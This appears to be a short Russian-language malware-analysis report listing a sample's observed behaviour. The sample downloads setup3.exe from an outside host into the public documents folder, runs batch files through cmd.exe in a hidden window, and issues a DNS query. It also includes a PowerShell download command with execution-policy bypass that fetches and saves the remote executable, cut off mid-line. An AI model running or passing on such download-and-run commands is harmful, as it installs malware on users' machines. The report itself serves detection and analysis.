Техническая информация
- http://onwamay.ru/x/setup3.exe как c:\users\public\documents\dfshjhdxzwdfsn.exe
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\sadjJHdsf.bat" "
- C:\users\public\documents\sadjjhdsf.bat
- DNS ASK on##may.ru
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\sadjJHdsf.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://onwamay.ru/x/setup3.exe','C:\Users\Public\Documents\DFSHJhdxzwdfsn.ex...